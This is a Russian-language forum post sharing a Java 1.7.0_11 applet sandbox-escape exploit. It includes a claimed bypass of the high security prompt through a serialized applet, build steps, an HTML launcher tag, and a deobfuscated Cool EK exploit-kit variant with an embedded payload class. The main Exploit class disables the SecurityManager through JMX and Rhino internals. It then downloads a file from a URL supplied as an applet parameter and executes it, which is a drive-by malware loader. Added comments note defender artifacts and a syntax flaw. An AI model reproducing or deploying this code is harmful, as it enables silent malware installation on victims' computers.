
1.7.0.11 with HLS bypass

так как сплойт утек в паблик, выкладываю свой вариант вместе с обходом high level security:

Сам .class:
Код:
import java.net.URL;
import java.net.URLConnection;
import java.nio.charset.MalformedInputException;
import java.io.*;
import java.applet.*;
import java.lang.*;
import com.sun.jmx.mbeanserver.*;
import java.lang.reflect.Method;
import javax.management.ReflectionException;

/**
 * Applet sandbox escape as posted for Java 1.7.0_11.
 *
 * Sequence visible in {@link #start()}: obtain restricted
 * {@code sun.org.mozilla.javascript.internal} classes through the JMX
 * {@code MBeanInstantiator} ({@link #loadClass}), reflect on them via
 * {@code Introspector.elementFromComplex} ({@link #getMethod}), define an embedded
 * helper class (hex string in {@code start}) through Rhino's {@code DefiningClassLoader},
 * instantiate it, then download the URL given in applet parameter {@code "j329"} to a temp
 * file and execute it. The embedded class's constant pool contains the strings
 * {@code setSecurityManager}, {@code doPrivileged} and {@code Disabler.java} (readable in
 * the hex) - presumably it clears the SecurityManager; not verified here.
 *
 * Defender notes (artifacts observable from this listing): applet code creating a
 * {@code JmxMBeanServer}, a class defined through the Rhino class loader, a temp file with
 * prefix {@code "aux-fn-ajkgh"} written and then passed to {@code Runtime.exec}, and the
 * {@code j329} applet parameter. This class-resolution path is closed in later JRE updates;
 * a current JRE or a disabled browser plugin mitigates it.
 *
 * NOTE: the {@code @"..."} literals in {@code start()} are not valid Java syntax; the
 * listing as posted does not compile unmodified.
 */
public class Exploit extends Applet
 {

    /**
     * Finds a declared method of {@code classObject} by name.
     *
     * Uses {@code Introspector.elementFromComplex(..., "declaredMethods")} rather than
     * {@code Class.getDeclaredMethods()} - presumably so the lookup runs from a trusted JDK
     * frame instead of the sandboxed applet; confirm against the JRE source.
     *
     * @param classObject  class to search
     * @param methodName   method name to match
     * @param onlyNullArgs when true, only a zero-parameter overload matches
     * @return the first matching method, or {@code null} if none matched or the lookup threw
     */
    private Method getMethod(Class classObject, String methodName, boolean onlyNullArgs)
    {
        try
        {
            Method[] methods = (Method[])Introspector.elementFromComplex((Object)classObject, "declaredMethods");
            for(Method method : methods)
            {
                String name = method.getName();
                Class[] types = method.getParameterTypes();
                
                // Reference comparison (!=), not equals(): appears to rely on
                // Method.getName() returning the interned name so it matches the
                // literals passed by the callers - TODO confirm.
                if(name != methodName)
                    continue;
                
                if(onlyNullArgs && types.length != 0)
                    continue;
                
                return method;
                
            }
        }
        catch(Exception e)
        {
            e.printStackTrace();
        }
        return null;
    }
    
    /**
     * Applet start hook; performs the escape described on the class.
     *
     * Enters a Rhino {@code Context}, creates its class loader with a null parent,
     * defines the embedded class from {@code s} via {@code defineClass(null, bytes)},
     * instantiates it, then hands applet parameter {@code "j329"} to {@link #run(String)}.
     * Every exception is printed and swallowed.
     */
    public void start()
    {
        try
        {
            Class classContext = loadClass(@"sun.org.mozilla.javascript.internal.Context");
            Class classDefiningClassLoader = loadClass(@"sun.org.mozilla.javascript.internal.DefiningClassLoader");
            
            Method methodContextEnter = getMethod(classContext, @"enter", true);
            Object ctx = methodContextEnter.invoke(null);
            
            Method methodContextCreateClassLoader = getMethod(classContext, @"createClassLoader", false);
            Object classLoader = methodContextCreateClassLoader.invoke(ctx, new Object[]{null});
            
            // DisableSecurity.class bytecode
            // Hex-encoded class file, decoded by hex2str() below; its SourceFile
            // attribute reads "Disabler.java".
            String s = "CAFEBABE00000033002D0A0007001B0A001C001D07001E0A0003001F0A002000210700220700230700240100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100294C6A6176612F73656375726974792F50726976696C65676564416374696F6E457863657074696F6E3B0100047468697301000A4C44697361626C65723B01000D537461636B4D61705461626C6507002207001E01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A457863657074696F6E7307002501000A536F7572636546696C6501000D44697361626C65722E6A6176610C0009000A0700260C002700280100276A6176612F73656375726974792F50726976696C65676564416374696F6E457863657074696F6E0C0029000A07002A0C002B002C01000844697361626C65720100106A6176612F6C616E672F4F626A6563740100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E0100136A6176612F6C616E672F457863657074696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B01000F7072696E74537461636B54726163650100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B2956002100060007000100080000000200010009000A0001000B0000007800010002000000122AB700012AB8000257A700084C2BB60004B1000100040009000C00030003000C0000001A0006000000070004000A0009000F000C000C000D000E00110010000D000000160002000D0004000E000F0001000000120010001100000012000000100002FF000C00010700130001070014040001001500160002000B00000034000100010000000601B8000501B000000002000C0000000A00020000001400040016000D0000000C000100000006001000110000001700000004000100180001001900000002001A";
            byte[] byteCode = hex2str(s);
            Method methodClassLoaderDefineClass = getMethod(classDefiningClassLoader, @"defineClass", false);
            Class securityDisabler = (Class)methodClassLoaderDefineClass.invoke(classLoader, null, byteCode);
            
            // Instantiation alone is the trigger: the embedded class's work happens in its constructor.
            securityDisabler.newInstance();
            String url = this.getParameter("j329");
            run(url);

            
  
        }
        catch(ReflectionException e)
        {
            e.printStackTrace();

        }
        catch(Exception e)
        {
            e.printStackTrace();
        }

    }
    
    /**
     * Reads a classpath resource fully into a byte array.
     * Not called anywhere in this listing (the payload is embedded as hex instead).
     * The input stream is never closed, and a missing resource gives a
     * NullPointerException on the first read().
     *
     * @param name resource name as understood by {@code Class.getResourceAsStream}
     * @return the resource bytes
     * @throws IOException on read failure
     */
    private byte[] loadByteCode(String name) throws IOException
    {
        byte[] temp = new byte[8149];
        
        ByteArrayOutputStream outStream = new ByteArrayOutputStream();
        InputStream inStream = getClass().getResourceAsStream(name);
        
        int length;
        while((length = inStream.read(temp)) > 0)
        {
            outStream.write(temp, 0, length);
        }
        
        return outStream.toByteArray();
    }

    
    /**
     * Resolves a class by name through the JMX {@code MBeanInstantiator.findClass}
     * with a null class loader. This is the restricted-class lookup the escape depends
     * on: presumably it hands out internal {@code sun.*} classes that the applet sandbox
     * would refuse through {@code Class.forName} - confirm against the JRE source.
     *
     * @param name fully-qualified class name
     * @return the resolved class
     * @throws ReflectionException if the instantiator cannot find it
     */
    private Class loadClass(String name) throws ReflectionException
    {
        ClassLoader a = null;
        

        JmxMBeanServer server = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
        MBeanInstantiator instatiator = server.getMBeanInstantiator();
        return instatiator.findClass(name, a);        
    }
    
    /**
     * Decodes a hex string into bytes, two characters per byte (case-insensitive via
     * {@code Character.digit}). No validation: an odd-length input throws
     * StringIndexOutOfBoundsException on the last character, and a non-hex character
     * contributes {@code -1} from Character.digit instead of failing.
     *
     * @param s hex text
     * @return decoded bytes, {@code s.length()/2} long
     */
    private static byte[] hex2str(String s)
    {
        byte[] buffer = new byte[s.length()/2];
        for(int i = 0; i < s.length(); i+=2)
        {
            byte n = (byte)((Character.digit(s.charAt(i), 16) << 4) + (Character.digit(s.charAt(i+1), 16)));
            buffer[i/2] = n;
        }
        return buffer;

    }

    /**
     * Downloads {@code url} to a temp file and executes it; every exception is silently
     * swallowed. {@code file != ""} is a reference comparison that only works because
     * {@link #download} returns the same {@code ""} literal on failure.
     *
     * @param url location to fetch (from the {@code j329} applet parameter)
     */
    public void run(String url)
    {
       try
        {
            String file = download(url);
            if(file != "")
            {
                execute(file);
            }
            
        }
        catch(Exception e) {}
    
        return;
    }

    /**
     * Creates an empty temp file with the fixed prefix {@code "aux-fn-ajkgh"} and suffix
     * {@code ".tmp"} in the default temp directory and returns its absolute path.
     * Defender note: that prefix is a file-system artifact of this sample.
     *
     * @return absolute path of the new file
     * @throws IOException if the file cannot be created
     */
    private static String getTempPath() throws IOException
    {
        File temp = File.createTempFile("aux-fn-ajkgh", ".tmp");
        return temp.getAbsolutePath();
    }

    /**
     * Launches the downloaded file via {@code Runtime.exec(String)}. Only reaches the
     * OS once the SecurityManager is gone; otherwise it throws a SecurityException
     * that {@link #run} swallows.
     *
     * @param file path to execute
     * @throws IOException from Runtime.exec
     */
    private void execute(String file) throws IOException
    {
         Runtime.getRuntime().exec(file);
    }
    
    /**
     * Streams {@code path} into a fresh temp file and returns that file's path, or
     * {@code ""} on any failure (exception swallowed). {@code streamInput} is never
     * closed; {@code streamOutput} is closed only on the success path.
     *
     * @param path URL to fetch
     * @return absolute path of the written temp file, or {@code ""}
     */
    private String download(String path)
    {       
        try
        {
            URL url = new URL(path);
            URLConnection link = url.openConnection();
            
            File file = new File(getTempPath());
            BufferedInputStream streamInput = new BufferedInputStream(link.getInputStream());
            BufferedOutputStream streamOutput = new BufferedOutputStream(new FileOutputStream(file));
                
            byte[] buffer = new byte[1024];
                
            while(true)
            {
                int cnt = streamInput.read(buffer);
                if(cnt == -1)
                {
                    break;
                }
                    
                streamOutput.write(buffer, 0, cnt);
            }
                
            streamOutput.flush();
            streamOutput.close();
                       
            return file.getAbsolutePath();
        }
        catch(Exception e){}
        
        return "";
    }
}


Сериализация:
Код:
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

/**
 * Writes a serialized {@code Exploit} instance to {@code Exploit.ser}.
 *
 * The post loads the applet through {@code <applet object="Exploit.ser">} instead of a
 * class file and presents this as the bypass of the JRE "high" security-level prompt;
 * the mechanism is not verified here. {@code ts.stop()} is called before serialization -
 * its purpose is not evident from the listing. {@code fos} is not closed if
 * {@code write} throws (no try/finally).
 */
public class SerApplet 
{
    
    /**
     * Serializes a fresh {@code Exploit} to the file {@code Exploit.ser} in the working directory.
     *
     * @param args ignored
     * @throws IOException on serialization or file errors
     */
    public static void main(String args[]) throws IOException
    {
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        ObjectOutputStream oos=new ObjectOutputStream(baos);
        Exploit ts = new Exploit();
        ts.stop();
        oos.writeObject(ts);
        FileOutputStream fos=new FileOutputStream("Exploit.ser");
        fos.write(baos.toByteArray());
        fos.close();
    }
    
}

Компилируем оба класса, Exploit.class сохраняем. Далее делаем джарник для сериализатора

%JDK_PATH%\bin\jar.exe -cfe s.jar SerApplet *.class

Запускаем джарник сериализатора и получаем Exploit.ser.
Для использования нужно положить в корень Exploit.class и Exploit.ser, для запуска используем вот такой html

Код:
<html><head></head>
<body>
<!-- Loads the applet from a serialized instance (object=) rather than a class file;
     the post presents this as the way past the JRE security-level prompt (not verified here).
     Defender note: an applet tag whose object= points at a .ser resource is worth flagging. -->
<applet object="Exploit.ser" width="1" height="1">
</applet></body></html>
 
Другой вариант из Cool EK:
Код:
/*
*   From Paunch with love (Java 1.7.0_11 Exploit)
*   
*   Deobfuscated from Cool EK by SecurityObscurity
*
*   https://twitter.com/SecObscurity
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;

/**
 * Deobfuscated Cool EK variant of the same Java 1.7.0_11 technique as {@code Exploit}
 * above. Differences visible here: the class to define is read from the jar resource
 * {@code Payload.class} instead of an embedded hex string; {@code defineClass} is looked
 * up on {@code GeneratedClassLoader} rather than {@code DefiningClassLoader};
 * {@code MBeanInstantiator.findClass} is itself invoked reflectively; and after
 * instantiation it calls the static {@code Payload.outSandbox()} (which runs
 * {@code calc.exe} as a proof-of-concept marker). {@code init()} swallows every Throwable.
 */
public class PaunchGift extends Applet
{
 
  /**
   * Applet init hook: loads {@code Payload.class} bytes, defines them through the Rhino
   * class loader obtained via a {@code Context}, instantiates the class and invokes its
   * static {@code outSandbox}. Any Throwable is swallowed, so failures are silent.
   */
  public void init()
  {
    
    try
    {   
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();
           
           // read in the class file from the jar
           // (the stream is never closed; a missing resource gives a NullPointerException)
           InputStream is = getClass().getResourceAsStream("Payload.class");
           
           // and write it out to the byte array stream
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );
               
           // convert it to a simple byte array
           buffer = os.toByteArray();
            
          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); 
          
          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          Method method1 = getMethod(class1, "createClassLoader", false);
          // new Object[1] == a single null argument (parent loader)
          Object obj1 = method1.invoke(obj, new Object[1]);
    
          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader"); 
          Method method2 = getMethod(class2, "defineClass", false);
          
          // defineClass(null, bytes); the constructor of Payload does the privileged work
          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          my_class.newInstance();
          Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
          m_outSandbox.invoke(null, new Object[] {});
      
    }
    catch (Throwable localThrowable){}
    
  }
    
  
   /**
    * Finds a declared method of {@code class1} named {@code s} via
    * {@code Introspector.elementFromComplex} (see the note on {@code Exploit.getMethod}
    * above); with {@code flag} set, only a zero-parameter overload matches.
    * Name matching is {@code ==} on strings, not {@code equals}.
    *
    * @return the first match, or {@code null} if none or if the lookup threw (swallowed)
    */
   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;
      
      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; 
      }
    } catch (Exception localException) {  }

    return null;
  }
  
  /**
   * Resolves {@code s} through {@code MBeanInstantiator.findClass(name, null)}, itself
   * reached via {@code Class.forName} + {@code getMethod} + {@code invoke} rather than a
   * direct call (presumably to avoid a compile-time reference to the internal class).
   *
   * @param s fully-qualified class name
   * @return the resolved class
   * @throws ReflectionException           declared but not thrown directly here
   * @throws ReflectiveOperationException  from the reflective lookup/invoke
   */
  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
        
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }
  
}

############################################### 
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

/**
 * Helper class that {@code PaunchGift} defines inside the Rhino class loader.
 *
 * The constructor runs {@link #run()} under {@code AccessController.doPrivileged};
 * this can only succeed if the defining loader gives the class a privileged protection
 * domain - presumably the case, but not shown in this listing. {@code run()} reflectively
 * calls {@code System.setSecurityManager(null)}, i.e. removes the sandbox entirely;
 * {@link #outSandbox()} then runs {@code calc.exe} as the proof-of-concept action.
 */
public class Payload implements PrivilegedExceptionAction
{
   
    /** Triggers the privileged action on construction; any exception is swallowed. */
    public Payload()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    /**
     * Privileged body: invokes {@code System.setSecurityManager} with a null argument
     * ({@code new Object[1]} is a one-element array holding {@code null}).
     *
     * @return always {@code null}
     * @throws Exception from the reflective lookup or invocation
     */
    public Object run() throws Exception
    {
        Class cl = System.class; 
        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
        m.invoke(null, new Object[1]);
        return null;
    }

    /**
     * Proof-of-concept action invoked by {@code PaunchGift.init()} after the manager is cleared.
     *
     * @throws Exception from Runtime.exec
     */
    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}
src: https://twitter.com/SecObscurity/status/304179429679177728
 

